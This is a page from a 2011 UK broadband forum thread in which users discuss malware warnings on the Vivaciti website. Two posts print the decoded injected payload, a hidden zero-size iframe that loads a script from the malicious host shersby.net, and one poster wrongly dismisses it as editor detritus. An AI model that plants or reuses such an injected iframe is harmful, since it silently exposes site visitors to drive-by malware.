User comments on ISPs
  >> Other Providers (without dedicated forums)

Register (or login) on our website and you will not see this ad.

Pages in this thread: 1 | [2] | 3 | 4 | 5 | 6 | 7 | >> (show all)   Print Thread
Standard User Kimi
(knowledge is power) Sun 06-Nov-11 09:37:13
Print Post

Re: Warning of Malware on Vivaciti web site

[re: bernardbrown] [link to this post]

In reply to a post by bernardbrown:
I've just been on this site with IE9, Firefox7 and Chrome15 and I use AVG2012 free edition which is up to date. There is no notes to say of any problems. It might just be either an over active virus checker or someone is trying to scare people away from the site.

nothing to do with virus checkers, google gives the warning through Chrome. Heres the diagnostic page

Yep google are trying to scare people away from the site.
Standard User RobertoS
(sensei) Sun 06-Nov-11 10:17:12
Print Post

[re: Kimi] [link to this post]

I did copy and google the hex code at the end of the Home Page, that Matt mentioned. It appears as a large smiley face with "YO!" and a bit of odd stuff at the bottom.

My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
Standard User XRaySpeX
(knowledge is power) Mon 07-Nov-11 23:43:28
Print Post

[re: RobertoS] [link to this post]

Funny! I translated it as:
<iframe width="0" height="0" style="width: 0%; height: 0%;" frameborder="0" src="http://shersby.net/sTDS/go.php?sid=1"></iframe>write
but then I'm not Google grin.

Looks like some detritus left behind by an HTML editor.

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC

Register (or login) on our website and you will not see this ad.

Standard User MadMan
(knowledge is power) Mon 07-Nov-11 23:51:48
Print Post

[re: warweezil] [link to this post]

Kaspersky still does give a warning.

plusnet
Standard User XRaySpeX
(knowledge is power) Tue 08-Nov-11 02:20:32
Print Post

In reply to a post by Kimi:
google gives the warning through Chrome.
Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.

Up to this evening a Google search for vivaciti.net took you to their homepage, but now it gives you:
Warning - visiting this web site may harm your computer!
and refuses to take you there.

Whereas, at least since the start of this thread, a Google search for shersby.net tells you on the results page "This site may harm your computer." and blocks you from visiting it.

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Standard User Kimi
(knowledge is power) Tue 08-Nov-11 07:09:10
Print Post

[re: XRaySpeX] [link to this post]

In reply to a post by XRaySpeX:
Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.

Google gives the warning whether you go direct or through a search
Standard User RobertoS
(sensei) Tue 08-Nov-11 08:19:11
Print Post

In reply to a post by Kimi:
google gives the warning through Chrome.
[cough]Chrome browser is by who? smile

My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.

Standard User RobertoS
(sensei) Tue 08-Nov-11 08:31:45
Print Post

Funny! I translated it as:
<iframe width="0" height="0" style="width: 0%; height: 0%;" frameborder="0" src="http://shersby.net/sTDS/go.php?sid=1"></iframe>write
but then I'm not Google grin.

Looks like some detritus left behind by an HTML editor.
Start at \x3C\x69\x66\x72\ following the var _0x3f46 and end before the closing quote of that. Copy that long hex sequence into google.uk, and the first result link is
http://downloads.securityfocus.com/vulnerabilities/e...
giving you what I described, occupying more than a full screen. But I just noticed Norton also gave a warning about a malicious script, the first time I went to vivaciti after an overnight laptop switch-off, (not the second time), so perhaps I'm not seeing the nasty bit in View Source in IE9. See following edited reply to MadMan.

Edited by RobertoS (Tue 08-Nov-11 08:46:50)

Standard User RobertoS
(sensei) Tue 08-Nov-11 08:32:53
Print Post

[re: MadMan] [link to this post]

In reply to a post by MadMan:
Kaspersky still does give a warning.
I just noticed Norton also gave a warning about a malicious script, the first time I went to vivaciti after an overnight laptop switch-off, but not the second time. False alarm. Examination of the Norton Activity log shows it was complaining about Sony Vaio Care trying to access the Norton exe.

Edited by RobertoS (Tue 08-Nov-11 08:45:05)

Standard User XRaySpeX
(knowledge is power) Tue 08-Nov-11 13:31:44
Print Post

Are you using Google DNS?

Pages in this thread: 1 | [2] | 3 | 4 | 5 | 6 | 7 | >> (show all)   Print Thread

Jump to